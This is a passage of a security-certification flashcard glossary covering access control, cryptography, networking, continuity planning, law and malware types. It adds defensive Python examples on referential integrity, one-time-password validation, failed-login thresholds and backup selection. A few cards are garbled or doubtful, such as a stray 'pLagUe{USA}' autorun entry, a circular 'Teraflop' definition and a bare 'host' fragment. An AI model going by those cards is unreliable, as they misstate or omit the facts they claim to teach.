documented approval from the data owner for a subject to access certain objects. Requires that the subject understand all rules regarding access and the consequences should data become lost, destroyed or compromised.
Erase Operation
does not overwrite blocks. Data is written to flash on a page level and a page must be completely erased before it can be written to again.
Due Care
doing what a reasonable person would do. The "prudent man" rule. E.g. parents have a duty to care for their children. Due diligence is the management of due care.
Asymmetric Encryption
encryption that uses two keys: if you encrypt with one you may decrypt with the other.
Full Disk Encryption (FDE)
encrypts an entire disk. This is superior to partially encrypted solutions, such as encrypted volumes, directories, folders or files
Emanations
energy that escapes an electronic system
Asset Tracking
enhances physical security. Asset tracking databases support regulatory compliance by identifying where data is.
Availability
ensures that information is available when needed.
Safety Warden
ensures that all personnel safely evacuate the building in the event of an emergency or drill.
Full disk encryption
ensures the confidentiality of mobile device data. Superior to partially encrypted solutions.
Layer 3 - Network
describes routing: moving data from a system on one LAN to a system on another. IP address.
Program Policy
establishes an organization's information security program.
Anomaly Detection
establishes a baseline of normal traffic and alerts on abnormal network activity. Can detect new attacks.
Exigent circumstances
evidence regarding an immediate threat to human life or of evidence being destroyed.
Security Incident
exists if the events suggest that violation of an organization's security posture has or is likely to occur.
Grey hat hackers
fall between the black and white hat hackers. Act without malicious intent. The goal of a gray hat is to improve system and network security.
Static Random Access Memory (SRAM)
fast, expensive memory that uses small latches called "flip flops" to store bits. Maintains integrity as long as power is supplied.
3 Types of Backups
full backup, incremental backup and differential backup.
White box software testing
gives the tester access to program source code, data structures, variables, etc
Black box testing
gives the tester no internal details: the software is treated as a black box that receives inputs
Simulation Test/Walkthrough Drill
goes beyond talking about the process and actually has teams carry out the recovery process.
Layer 2 - Data Link
handles access to the physical layer as well as local area network communication
Layer 4 - Transport
handles packet sequencing, flow control, and error detection. TCP and UDP are Layer 4 (Maintenance)
"Bad" blocks/clusters/sectors
hard disks routinely end up with sectors that cannot be read due to some physical defect. The sectors marked as bad will be ignored by the operating system since no data could be read in those defective portions
Coaxial
has an inner copper core ("D") separated by an insulator ("C"), with a plastic outer layer ("A").
Wet pipes
have water right up to the sprinkler heads. Bulbs come in different colors rated for different temperatures
Hand Geometry
These devices use a simple concept of measuring and recording the length, width, thickness, and surface area of an individual's hand.
Perimeter Defenses
help prevent, detect, and correct unauthorized physical access. Ideal qualities: safe, prevents ingress, authentication and accountability.
Stealth virus
hides itself from the OS and other protective software, such as antivirus software
Accountability
holds users accountable for their actions
Octets 2,3,4
host
IPsec Architectures
host-to-gateway, gateway-to-gateway, and host-to-host.
Service Level Agreements (SLA)
identifies key expectations that the vendor is contractually required to meet. Primarily addresses availability.
Sashimi Model
Highly overlapping steps; it can be thought of as a real-world successor to the Waterfall Model. Named after the Japanese delicacy sashimi, which has overlapping layers of fish.
Data Remanence
important to media sanitization and data destruction. Could refer to residual data that persists on magnetic storage.
Responsibilities(Policy)
include responsibilities of information security staff, policy and management teams, as well as responsibilities of all members of the organization.
Federal Interest Computer
includes government, critical infrastructure, or financial processing system.
Live forensics
includes taking a bit by bit, or binary image of physical memory, gathering details about running processes, and gathering network connection data.
Striping
increasing the read and write performance by spreading data across multiple hard disks
pLagUe{USA}
injects viruses into autorun.inf
Insiders
An insider attack is launched by an internal user who may be authorized to use the system that is attacked.
Bytecode
intermediary form (converted from source code), but still must be converted into machine code before it may run on the CPU. Platform-independent code
Parallel Processing
involves recovery of critical processing components at an alternate computing facility.
Synthetic Transactions
involves building scripts or tools that simulate activities normally performed in an application. Ensures the application is still performing as expected.
Mitigation
involves the process of understanding the cause of the incident so that the system can be reliably cleaned and ultimately restored to operational status later in the recovery phase.
Extranet
is a connection between private Intranets, such as connections to business partner Intranets
Free software
is a controversial term that is defined differently by different groups.
Kerberos
is a third-party authentication service that may be used to support Single Sign-On. AAA systems: authentication, authorization, and accountability. Main parts: the client, the KDC, and the server.
Freeware
is free of charge to use
Outsourcing
is the use of a third party to provide Information Technology support services that were previously performed in-house. Enhances the information technology resources.
Certificate Authorities(CA)
issue digital certificates. May be private or public (e.g. VeriSign).
Rotation of Duties
job rotation or rotation of responsibilities, provides an organization with a means to help mitigate the risk associated with any one individual having too many privileges
Server-side attacks(service side)
launched directly from an attacker to a listening service. The "Conficker" worm of 2008 spread via a number of methods, including TCP port 445 and exploiting a weakness in RPC. Defenses: patching, system hardening, firewalls, and other forms of defense in depth.
Criminal Law
laws where the victim can be seen as society itself. Exists to maintain an orderly and law-abiding citizenry. The goal is to deter crime and punish offenders.
Network Attacks
leverage client-side attacks, server-side attacks, or Web application attacks
Public Key Infrastructure(PKI)
leverages all three forms of encryption to provide and manage digital certificates. The standard digital certificate format for PKI is X.509.
CSRF
leverages third-party redirect of static content within the security context of a trusted site.
Modular Math
lies behind much of cryptography. Simply put, modular math shows you what remains (the remainder) after division. Called "clock math".
Certificate Revocation List(CRL)
lists certificates that have been revoked.
Payment Card Industry Data Security Standard (PCI-DSS)
a standard from the major vendors in the payment card portion of the financial industry. Ensures better protection of cardholder data through mandating security policy, security devices, control techniques, and monitoring of systems holding cardholder data.
Static NAT
makes a one-to-one translation between addresses
Zero-Day Exploits
malicious code for which there is no existing vendor-supplied patch.
Logic Bomb
malicious program that is triggered when a logical condition is met, such as after a number of transactions have been processed, or on a specific date/time.
Computer viruses
malware that does not spread automatically: requires a catalyst (human).
Trojan
malware that performs two functions. One benign (obfuscation), one malicious.
Worms
malware that self-propagates
Data processors
manage data on behalf of data controllers. An outsourced payroll company is an example of a data processor.
Layer 5 - Session
manages sessions, which provide maintenance on connections. (Maintenance)
Harrison- Ruzzo-Ullman Model
maps subjects, objects, and access rights to an access matrix. It is considered a variation of the Graham-Denning Model. Six primitive operations: create object, create subject, destroy subject, destroy object, enter right into access matrix, delete right from access matrix.
Biometrics
may be used to establish an identity, or to authenticate (prove an identity claim). E.g. airport facial recognition.
Packet Switched Networks
may use Quality of Service (QoS) to give specific traffic precedence over other traffic. QoS is often applied to Voice over IP (VoIP) to avoid interruption.
Entity integrity
means each tuple has a unique primary key that is not null.
Convergence
means that all routers on a network agree on the state of routing
Dedicated(Mode of Operation)
means that the system contains objects of one classification label. All subjects must possess a clearance equal to or greater than the label of the objects.
Parity
means to achieve data redundancy without incurring the same degree of cost as that of mirroring in terms of disk usage and write performance.
Voiceprint
measures the subject's tone of voice while stating a specific sentence or phrase
Configuration Item Identification
methodology for selecting and naming configuration items that need to be placed under CM
Database replication
mirrors a live database allowing simultaneous reads and writes to multiple replicated databases by clients
Technical Controls
mitigate infected mobile computers and devices.
Host-to-host(IPsec)
mode connects two systems (such as file servers) to each other via IPsec
Protocol Behavior IDS
models the way protocols should work, often by analyzing RFCs (Requests for Comments). RFC 793 describes TCP flags.
FRR preferred over FAR
most organizations would prefer to reject authentic subjects rather than accept impostors.
Clipper Chip
name of the technology used in the Escrowed Encryption Standard (EES), announced in 1993 by the US government. Used the Skipjack algorithm, a symmetric cipher with an 80-bit key. Originally a secret algorithm.
Network Stack
network protocol suite programmed in software or hardware
Baseband
networks that have one channel and can only send one signal at a time.
Ignorance of the Law
never an excuse for breaking the law.
Read Only Memory(ROM)
nonvolatile memory that maintains integrity after loss of power
Inference and Aggregation
occur when a user is able to use lower level access to learn restricted information.
Access aggregation
occurs as individual users gain more access to more systems
Reading Down
occurs when a subject reads an object at a lower sensitivity level. Ex: a Top Secret subject reading a Secret object. The subject reads down; data flows up.
Metasploit
open source Penetration Testing Tool
Public Cloud Computing
outsources IT infrastructure, storage, or applications to a third-party provider. Cloud computing provides Infrastructure as a Service (IaaS, eg: Linux server hosting), Software as a Service (SaaS, eg: Web service hosting), and Platform as a Service (PaaS, eg: Web mail).
Offshoring
outsourcing to another country. Can raise privacy and regulatory issues.
Frame Relay
packet-switched Layer 2 WAN protocol that provides no error recovery and focuses on speed
Administrative Countermeasures
policies, procedures, guidelines, standards.
Allocated space
portions of a disk partition that are marked as actively containing data
Unallocated space
portions of a disk partition that do not contain active data
Financial Damages: Statutory
prescribed by law, which can be awarded to the victim even if the victim incurred no actual loss or injury.
Separation of duties
prescribes that multiple people are required to complete critical or sensitive transactions
CO2
removing oxygen smothers fires
Configuration Monitoring
process for assessing or testing the level of compliance with the established baseline configuration and mechanisms for reporting on the configuration status of items placed under CM
Configuration Change Control
process for managing updates to the baseline configurations for the configuration items
Patch Management
process of managing software updates. All software has flaws or shortcomings that are not fully addressed in advance of being released
Protocol Governance
process of selecting the right method (cipher) and implementation.
Brownout
prolonged low voltage
Generators
protect against electrical failures. Designed to provide power for longer periods of time. Always place generators above potential flooding areas.
Transport Mode
protects the IP data (layers 4-7) only, leaving the original IP headers unprotected. Both modes add extra IPsec headers.
Secure Hardware Architecture must...
provide confidentiality, integrity, and availability for processes, data, users.
Circuit-switched networks
provide dedicated bandwidth to point-to-point connections, such as a T1. Being dedicated to one purpose is a drawback.
Kerberos Strength
provides mutual authentication. Mitigates replay attacks.
Packers
provide runtime compression of executables
Software Change and Configuration Management
provides a framework for managing changes to software as it is developed, maintained, and eventually retired.
Network Tap
provides a way to "tap" into network traffic. NIDS. Can "fail open"
SubBytes
provides confusion by substituting the bytes of the state according to a substitution table. 1. Take the byte of state to be substituted, "T". 2. T is hex 53. 3. Look up 5 on the X row, 3 on the Y column.
Mix Columns
provides diffusion by mixing via finite field mathematics
Hash Function
provides encryption using an algorithm and no key. One-way hash functions. Plaintext is changed to a fixed message length. Weaknesses found in both MD5 and SHA1.
Full-Knowledge Test/ Crystal Box
provides internal information to the penetration tester, including network diagrams, policies and procedures, and sometimes reports from previous penetration testers
Zachman Framework for Enterprise Architecture
provides six frameworks for providing information security, asking what, how, where, who, when, and why, and mapping those frameworks across roles including planner, owner, designer, builder, programmer, and user.
Authentication
proving an identity claim
Virtual SAN
provisioning of virtualized storage
Asymmetric Encryption
public key, private key. Encrypt public, Decrypt private
Open source
publishes source code publicly. Ubuntu, Apache
MTBF
quantifies how long a new or repaired system will run before failing
Mean Time Between Failures
quantifies how long a new or repaired system will run on average before failing
Assurance correctness
range from E0(inadequate) to E6(formal model of security policy); Functionality rating range include TCSEC equivalent ratings(F-C1, F-C2, etc.)
Layer 2 Broadcast Traffic
reaches all nodes in a "broadcast domain."
Warm Site
readily accessible hardware and connectivity, but it will have to rely upon backup data in order to reconstitute a system after a disruption.
Benefits of Cloud
reduced upfront capital expenditure, reduced maintenance costs, robust levels of service, and overall operational cost savings.
Password cracking
refers to an offline technique in which the attacker has gained access to the password hashes or database
Keyboard dynamics
refers to how hard a person presses each key and the rhythm by which the keys are pressed
Static analysis
reviews the raw source code itself looking for evidence of known insecure practices, functions, libraries, or other characteristics having been used in the source code.
Vulnerability scanning
scans a network or system for a list of predefined vulnerabilities such as system misconfiguration, outdated software, or a lack of patching.
Data mining
searches large amounts of data to determine patterns that would otherwise get lost in the noise. Credit card issuers are experts in data mining: "X or more purchases, in Y time, in Z places."
Level 1 Cache
second fastest form of cached memory, located on the CPU itself.
VPN
secures data sent via insecure networks such as the Internet.
Dynamic testing
security checks are performed while actually running or executing the code or application under review
Chaining
seeds the previous encrypted block into the next block to be encrypted, destroying patterns in the resulting ciphertext.
Denial of Service(DoS) Attack
seeks to deny service(or availability) of a system
Database normalization
seeks to make the data in a database table logically concise, organized, and consistent.
Integrity
seeks to prevent unauthorized modification of information. In other words, integrity seeks to prevent unauthorized write access. Ensure data accuracy and completeness
System Integrity
seeks to protect a system, such as a Windows 2008 server operating system.
Data Integrity
seeks to protect information against unauthorized modification
Ping
sends an ICMP Echo Request to a node and listens for an ICMP Echo Reply
Sensitive but Unclassified
sensitive data that is not a matter of national security
Time Multiplexing
shares system resources between multiple processes, each with a dedicated slice of time.
Electrical Fault
short- and long-term interruption of power. Impacts availability and integrity. Sudden loss of power can damage disks.
Backdoors
shortcuts in a system that allow a user to bypass security checks (such as username/password authentication) to log in
Common Law
places significant emphasis on particular cases and judicial precedents as determinants of the laws. Legislative bodies are typically tasked with the creation of new statutes and laws.
Deluge
similar to dry pipes, except the sprinkler heads are open and larger than dry pipe heads.
Machine code
software that is executed directly by the CPU
Hacktivist
someone who hacks for political reasons. Vietnamese DDoS.
Monoalphabetic Cipher
a specific letter is substituted for another.
Kerberos Weakness
stores the keys of all principals (clients and servers). The KDC and TGS are single points of failure.
Network Forensics
study of data in motion, with special focus on gathering evidence via a process that will support admission into court
Sequential Memory
such as tape, must sequentially read memory, beginning at offset zero, to the desired portion of memory.
Button locks
susceptible to brute force and shoulder surfing
RC5, RC6
symmetric block ciphers by RSA. Use 32, 64, or 128 bit blocks. Key size ranges from zero to 2040 bits.
Blowfish and Twofish
symmetric block ciphers created by Bruce Schneier. Blowfish uses 32 through 448 bit keys to encrypt 64 bit blocks. Twofish was a finalist.
Redundant Systems
if system availability is extremely important, then it might be prudent to have entire systems available in the inventory.
Mandatory Access Control
system-enforced access control based on subject's clearances and object's labels
Dry pipe
systems also have closed sprinkler heads; the difference is that the pipes are filled with compressed air.
Redundant Hardware
systems or devices that have redundant onboard power in the event of a power supply failure.
Recovery Controls
taken in order to restore functionality of the system and organization.
Hardware Segmentation
takes process isolation further by mapping processes to specific memory locations.
Spike
temporary high voltage
Sag
temporary low voltage
Preparation
Steps taken before an incident occurs. Training, writing incident response policies.
Teraflop
teraflop
Direct Evidence
testimony provided by a witness regarding what the witness actually experienced with her five senses.
Read-Through
testing lists all necessary components required for successful recovery, and ensures that they are, or will be, readily available should a disaster occur.
Acceptance Testing
testing to ensure the software meets the customer's operational requirements
Referential integrity
requires that every foreign key in a secondary (child) table matches a primary key in the parent table, so no orphaned rows exist.
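As an added example (not part of the original study set), the following Python uses SQLite to show referential integrity being enforced and, just as importantly, silently not enforced: SQLite accepts REFERENCES clauses but ignores them unless `PRAGMA foreign_keys = ON` is set on each connection, a common way to end up with orphaned rows. The customers/orders schema and rows are constructed for the demo; the last function is the audit query a practitioner would run against a database whose integrity is in doubt.

```python
import sqlite3

# Constructed schema: orders.customer_id is a foreign key into customers.id (the parent table).
SCHEMA = """
CREATE TABLE customers (
    id   INTEGER PRIMARY KEY,
    name TEXT NOT NULL
);
CREATE TABLE orders (
    id          INTEGER PRIMARY KEY,
    customer_id INTEGER NOT NULL REFERENCES customers(id) ON DELETE RESTRICT,
    total_cents INTEGER NOT NULL CHECK (total_cents >= 0)
);
INSERT INTO customers (id, name) VALUES (1, 'alice');
INSERT INTO orders (customer_id, total_cents) VALUES (1, 1999);
"""


def open_db(enforce_fk: bool) -> sqlite3.Connection:
    """SQLite parses REFERENCES clauses but ignores them unless foreign_keys is turned on, per connection."""
    conn = sqlite3.connect(":memory:")
    conn.execute("PRAGMA foreign_keys = ON" if enforce_fk else "PRAGMA foreign_keys = OFF")
    conn.executescript(SCHEMA)
    return conn


def try_orphan_insert(conn: sqlite3.Connection) -> bool:
    """Insert an order for a customer that does not exist. True if the database rejected it."""
    try:
        conn.execute("INSERT INTO orders (customer_id, total_cents) VALUES (999, 500)")
        return False
    except sqlite3.IntegrityError:
        return True


def try_delete_parent(conn: sqlite3.Connection) -> bool:
    """Delete a customer who still has orders. True if the database rejected it (ON DELETE RESTRICT)."""
    try:
        conn.execute("DELETE FROM customers WHERE id = 1")
        return False
    except sqlite3.IntegrityError:
        return True


def orphan_count(conn: sqlite3.Connection) -> int:
    """Audit query for an existing database: child rows whose foreign key matches no parent key."""
    return conn.execute("""
        SELECT COUNT(*) FROM orders o
        LEFT JOIN customers c ON c.id = o.customer_id
        WHERE c.id IS NULL
    """).fetchone()[0]


if __name__ == "__main__":
    for enforce in (True, False):
        conn = open_db(enforce)
        print(f"foreign_keys={'ON' if enforce else 'OFF'}: orphan insert rejected={try_orphan_insert(conn)}, "
              f"parent delete rejected={try_delete_parent(conn)}, orphans now={orphan_count(conn)}")
```

With enforcement on, both the orphan insert and the parent delete raise IntegrityError and the audit finds zero orphans; with it off, both succeed and the audit finds two. Other engines enforce foreign keys by default, but the audit query is still the check to run after bulk loads or migrations that disabled constraints.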
Accountability
the ability to audit a system and demonstrate the actions of subjects
Electronic Vaulting
the batch process of electronically transmitting data that is to be backed up at a routine, regularly scheduled time interval.
Accreditation
the data owner's acceptance of the certification, and of the residual risk, which is required before the system is put into production.
Evaluation Assurance Level (EAL)
the Common Criteria evaluation score (EAL1 through EAL7) assigned to the tested product or system. A higher level means a more rigorous evaluation, not necessarily a more secure product.
Business Impact Analysis (BIA)
the formal method for determining how a disruption to the IT system(s) of an organization will impact the organization's requirements, processes, and interdependencies with respect to the business mission.
Walkthrough/Tabletop
the goal is to allow individuals who are knowledgeable about the systems and services targeted for recovery to thoroughly review the overall approach
Log Reviews
the goal is to review logs to ensure they can support information security as effectively as possible
Cold Site
the least expensive recovery solution to implement. It does not include backup copies of data, nor does it contain any immediately available hardware.
Zero-Knowledge Test.
also called a black box test; the penetration tester begins with no external or trusted information and starts from public information only.
Confusion
the relationship between the plaintext and ciphertext should be as confused (random) as possible.
Response
the point at which the incident response team begins interacting with affected systems and attempts to keep further damage from occurring as a result of the incident
Mandatory Leave/Forced Vacation
the primary security considerations are similar to those addressed by rotation of duties. Forcing all employees to take leave can identify areas where depth of coverage is lacking, and can expose fraud that depends on the perpetrator's continual presence.
Tailoring
the process of customizing a standard for an organization. Begins with controls selection, continues with scoping, and finishes with the application of compensating controls.
System High
the system contains objects of mixed labels (e.g., confidential, secret, and top secret). All subjects must possess a clearance equal to or greater than the label of the highest-classified object on the system.
Certification
the system has been certified to meet the security requirements of the data owner.
Activate Team
the team that will be responsible for recovery needs to be activated.
Collusion
the term used for two or more parties conspiring to undermine the security of a transaction. Separation of duties raises the number of people who must collude.
Total Cost of Ownership(TCO)
the total cost of a mitigating safeguard. TCO combines upfront costs plus annual cost of maintenance, staff hours, fees, etc.
Routing Protocol Goal
to automatically learn a network topology, and learn the best routes between all network points
Information Security Professional Mission
to balance the needs of confidentiality, integrity, and availability, and make trade-offs as needed.
High Availability
to decrease the recovery time of a system or network device so that the availability of the service is less impacted than would be by having to rebuild, reconfigure, or otherwise stand up a replacement system
Scoping
to define exactly what assets are protected by the plan (BCP), which emergency events this plan will be able to address, and finally determining the resources necessary to completely create and implement the plan
Vendor Governance
to ensure that a business is continually getting sufficient quality from its third-party providers.
Reconstitution
to successfully recover critical business operations either at primary or secondary site
Change Management
to understand, communicate, and document any changes with the primary goal of being able to understand, control, and avoid direct or indirect negative impact that the change might impose
Object Encapsulation
treats a process as a black box.
Twisted Pair Cabling
twisting each pair of wires together cancels much of the electromagnetic interference, making the cable less susceptible to EMI. Cable categories run from Cat 1 through Cat 6; the categories rated for Ethernet data networking begin at Cat 3.
NIST Special Publication 800-128
Guide for Security-Focused Configuration Management of Information Systems
Trademark dilution
unintentional attack in which the trademarked brand name is used to refer to the larger general class of products, e.g., Kleenex.
Biometric controls
must be usable by all staff, or compensating controls must exist. Potential exchange of bodily fluid is a serious negative for any biometric control (compare airport bathrooms designed without door handles).
Distance Vector Routing Protocols
use a simple metric, typically hop count, and periodically send their entire routing table to directly connected neighbors (e.g., RIP). They are simple but converge slowly.
Synchronous dynamic tokens
use time or counters to synchronize a displayed token code with the code expected by the authentication server, e.g., a bank's text-message code.
One-time passwords
used for a single authentication, after which the value is useless to an eavesdropper. They are very secure but difficult to manage.
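As an added example covering both synchronous dynamic tokens and one-time passwords (not part of the original study set), the following Python implements the two standard token algorithms, counter-based HOTP (RFC 4226) and time-based TOTP (RFC 6238), plus the server-side validation each one needs: a look-ahead window so a counter token that has drifted ahead can resynchronize, a clock-skew window for time tokens, and replay rejection so a code really is one-time. The shared secret `12345678901234567890` is the RFC 4226 test-vector key, used here only as constructed demo input; everything else (class names, window sizes) is this example's own choice.

```python
import hashlib
import hmac
import struct


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, dynamic truncation, then mod 10^digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)


def totp(secret: bytes, unix_time: float, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP whose counter is the number of time steps elapsed since the Unix epoch."""
    return hotp(secret, int(unix_time // step), digits)


class HotpValidator:
    """Counter-synchronized server side: accepts the expected counter or a small look-ahead window
    (the user may have pressed the token button without logging in) and never accepts a counter twice."""

    def __init__(self, secret: bytes, look_ahead: int = 5):
        self.secret, self.counter, self.look_ahead = secret, 0, look_ahead

    def verify(self, code: str) -> bool:
        for c in range(self.counter, self.counter + self.look_ahead + 1):
            if hmac.compare_digest(hotp(self.secret, c), code):
                self.counter = c + 1      # resynchronize and burn this counter
                return True
        return False


class TotpValidator:
    """Time-synchronized server side: tolerates +/- skew_steps of clock drift between token and server,
    and rejects a replay of any time step that has already been used."""

    def __init__(self, secret: bytes, step: int = 30, skew_steps: int = 1):
        self.secret, self.step, self.skew_steps = secret, step, skew_steps
        self.last_step_used = -1

    def verify(self, code: str, unix_time: float) -> bool:
        now_step = int(unix_time // self.step)
        for s in range(now_step - self.skew_steps, now_step + self.skew_steps + 1):
            if s <= self.last_step_used:
                continue                  # replay protection: this step (or an older one) was already spent
            if hmac.compare_digest(hotp(self.secret, s), code):
                self.last_step_used = s
                return True
        return False


if __name__ == "__main__":
    secret = b"12345678901234567890"      # RFC 4226 test-vector key, constructed demo input only
    print("HOTP counters 0..2:", [hotp(secret, c) for c in range(3)])
    print("TOTP at t=59s:", totp(secret, 59), "(8 digits:", totp(secret, 59, digits=8) + ")")
    server = HotpValidator(secret)
    print("first use:", server.verify(hotp(secret, 0)), "replay:", server.verify(hotp(secret, 0)))
```

The management burden the definition mentions shows up in the validators: the server must keep per-user state (the next counter, or the last time step used) and protect the shared secret as carefully as a password database, since anyone holding the secret can compute every future code.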
Initialization Vector (IV)
used with symmetric block cipher modes such as CBC so that the first encrypted block, and therefore all later blocks, differs each time, even when the same plaintext is encrypted under the same key. The IV need not be secret, but it must be unique per message (and unpredictable for CBC).
Clipping levels
used to differentiate between malicious attacks and normal users accidentally mistyping their passwords. Define a minimum reporting threshold level; only activity above that level (e.g., more than a handful of failed logins from one source within a short window) is reported.
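As an added example (not part of the original study set), the following Python applies a clipping level to failed-login records: it parses sshd-style log lines, counts failures per source address in a sliding window, and reports a source only once the count exceeds the threshold. The log lines are constructed in the style of Linux auth.log entries, not captured from a real system; the threshold of 5 failures in 10 minutes is an assumed policy value. A user who mistypes twice and then logs in never appears in the report; a source hammering several accounts does.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample in the style of Linux sshd auth.log lines (not captured from a real system).
SAMPLE_LOG = """\
Mar 10 08:00:01 bastion sshd[4101]: Failed password for alice from 10.0.0.5 port 50122 ssh2
Mar 10 08:00:09 bastion sshd[4101]: Failed password for alice from 10.0.0.5 port 50122 ssh2
Mar 10 08:00:15 bastion sshd[4101]: Accepted password for alice from 10.0.0.5 port 50122 ssh2
Mar 10 08:01:00 bastion sshd[4120]: Failed password for root from 203.0.113.9 port 41000 ssh2
Mar 10 08:01:02 bastion sshd[4121]: Failed password for admin from 203.0.113.9 port 41001 ssh2
Mar 10 08:01:04 bastion sshd[4122]: Failed password for invalid user test from 203.0.113.9 port 41002 ssh2
Mar 10 08:01:06 bastion sshd[4123]: Failed password for root from 203.0.113.9 port 41003 ssh2
Mar 10 08:01:08 bastion sshd[4124]: Failed password for root from 203.0.113.9 port 41004 ssh2
Mar 10 08:01:10 bastion sshd[4125]: Failed password for root from 203.0.113.9 port 41005 ssh2
Mar 10 09:30:00 bastion sshd[4300]: Failed password for bob from 10.0.0.7 port 50200 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_failures(log_text: str, year: int = 2024) -> list:
    """Extract (timestamp, source IP, username) from failed-login lines; syslog timestamps omit the year."""
    events = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["src"], m["user"]))
    return events


def clipping_level_alerts(events: list, threshold: int = 5, window_seconds: int = 600) -> dict:
    """Report a source only once its failures inside a sliding window EXCEED the clipping level.
    At or below the level (a user mistyping twice) nothing is reported; above it, record the moment
    the level was first crossed and the count seen then."""
    recent = defaultdict(deque)
    alerts = {}
    for ts, src, _user in sorted(events):
        window = recent[src]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) > threshold and src not in alerts:
            alerts[src] = {"first_alert": ts.isoformat(), "failures_in_window": len(window)}
    return alerts


if __name__ == "__main__":
    events = parse_failures(SAMPLE_LOG)
    print(f"{len(events)} failed logins parsed")
    for src, info in clipping_level_alerts(events).items():
        print("ALERT", src, info)
```

Keying the count on the source address catches password spraying across many accounts, which a per-account threshold would miss; a production rule usually keeps both counters. The threshold and window are the tuning knobs: set too low, the analyst drowns in typos, set too high, a slow brute force stays under the level.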
Symmetric Encryption
uses one key to encrypt and decrypt. Usually shared out-of-band such as face-to-face. Also called "Secret key" encryption.
Closed System
uses only proprietary hardware or software.
Open System
uses open hardware and standards, using standard components from a variety of vendors. An IBM-compatible PC is an Open system.
Social Engineering
uses the human mind to bypass security controls.
Proprietary software
usually copyrighted and possibly patented
TTL field
Every time a packet passes through a router, the router decrements the TTL field. When it reaches 0, the router drops the packet and sends an ICMP Time Exceeded message back to the sender (this is how traceroute maps a path).
Multipartite
virus that spreads via multiple vectors
Random Access Memory(RAM)
volatile hardware memory that loses integrity after loss of power
SanDisk Secure Erase Command
when the command is executed, all blocks in the physical address space, whether they are currently or previously allocated to the logical space, are completely erased.
Differential
will back up any files that have been changed since the last full backup, e.g., for Monday's differential backup, only those files changed since Sunday's full backup are archived. A restore needs the last full backup plus the latest differential.
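As an added example (not part of the original study set), the following Python implements the file-selection rule behind a differential backup and contrasts it with an incremental one: differential selects everything modified since the last full backup, incremental only what changed since the last backup of any kind, so differentials grow through the week while restores stay short. It builds a small temporary directory tree with back-dated modification times (constructed data; the week's timeline is an assumption) and returns the sets each mode would archive for Wednesday's run.

```python
import os
import shutil
import tempfile
import time

DAY = 86400


def select_files(root: str, last_full: float, last_any: float, mode: str) -> set:
    """Return the relative paths a backup of the given mode would archive.
    differential: everything modified since the last FULL backup;
    incremental:  everything modified since the last backup of ANY kind."""
    cutoff = {"differential": last_full, "incremental": last_any}[mode]
    selected = set()
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if os.stat(path).st_mtime > cutoff:
                selected.add(os.path.relpath(path, root).replace(os.sep, "/"))
    return selected


def restore_sets_needed(mode: str, days_since_full: int) -> int:
    """Backup sets a restore must read: full + latest differential, or full + every incremental since the full."""
    return 2 if mode == "differential" else 1 + days_since_full


def simulate_week() -> tuple:
    """Constructed tree with back-dated mtimes: full backup Sunday night, a daily backup each night after,
    and we are choosing files for Wednesday night's run. Returns (differential set, incremental set)."""
    root = tempfile.mkdtemp(prefix="backup_demo_")
    sunday = time.time() - 7 * DAY                # time of the last full backup
    mtimes = {                                    # relative path -> last modification time
        "static/a.txt": sunday - DAY,             # untouched since before the full backup
        "docs/b.txt":   sunday + 1 * DAY,         # changed Monday
        "docs/c.txt":   sunday + 2 * DAY,         # changed Tuesday
        "db/d.txt":     sunday + 3 * DAY,         # changed Wednesday
    }
    try:
        for rel, mtime in mtimes.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(rel)
            os.utime(path, (mtime, mtime))        # back-date the file so the walk sees the constructed history
        last_any = sunday + 2 * DAY + 3600        # Tuesday night's daily backup
        differential = select_files(root, sunday, last_any, "differential")
        incremental = select_files(root, sunday, last_any, "incremental")
    finally:
        shutil.rmtree(root)
    return differential, incremental


if __name__ == "__main__":
    diff, incr = simulate_week()
    print("differential:", sorted(diff))
    print("incremental: ", sorted(incr))
    print("sets to restore after 3 days:", restore_sets_needed("differential", 3), "vs", restore_sets_needed("incremental", 3))
```

Real backup software keys on archive bits or a catalog rather than raw mtimes, but the selection logic is the same; the trade-off the definition implies is visible in the output: Wednesday's differential carries three files, the incremental one, while a differential restore always needs exactly two sets.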
Dry Powder
works by lowering temperature and smothering the fire, starving it of oxygen.
OWASP Enterprise Security API Toolkits
• Authentication • Access control • Input validation • Output encoding/escaping • Cryptography • Error handling and logging • Communication security • HTTP security • Security configuration
Application Logs (typical contents)
• Client requests and server responses • Usage information • Significant operational actions
Change Management Process
• Identifying a change • Proposing a change • Assessing the risk associated with the change • Testing the change • Scheduling the change • Notifying impacted parties of the change • Implementing the change • Reporting results of the change implementation Changes must be auditable
BCP/DRP Mistakes
• Lack of management support • Lack of business unit involvement • Lack of prioritization among critical staff • Improper (often overly narrow) scope • Inadequate telecommunications management • Inadequate supply chain management • Incomplete or inadequate crisis management plan • Lack of testing • Lack of training and awareness • Failure to keep the BCP/DRP plan up to date
Kerberos Components
• Principal: Client (user) or service • Realm: A logical Kerberos network • Ticket: Data that authenticates a principal's identity • Credentials: a ticket and a service key • KDC: Key Distribution Center, which authenticates principals • TGS: Ticket Granting Service • TGT: Ticket Granting Ticket • C/S: Client/Server, regarding communications between the two
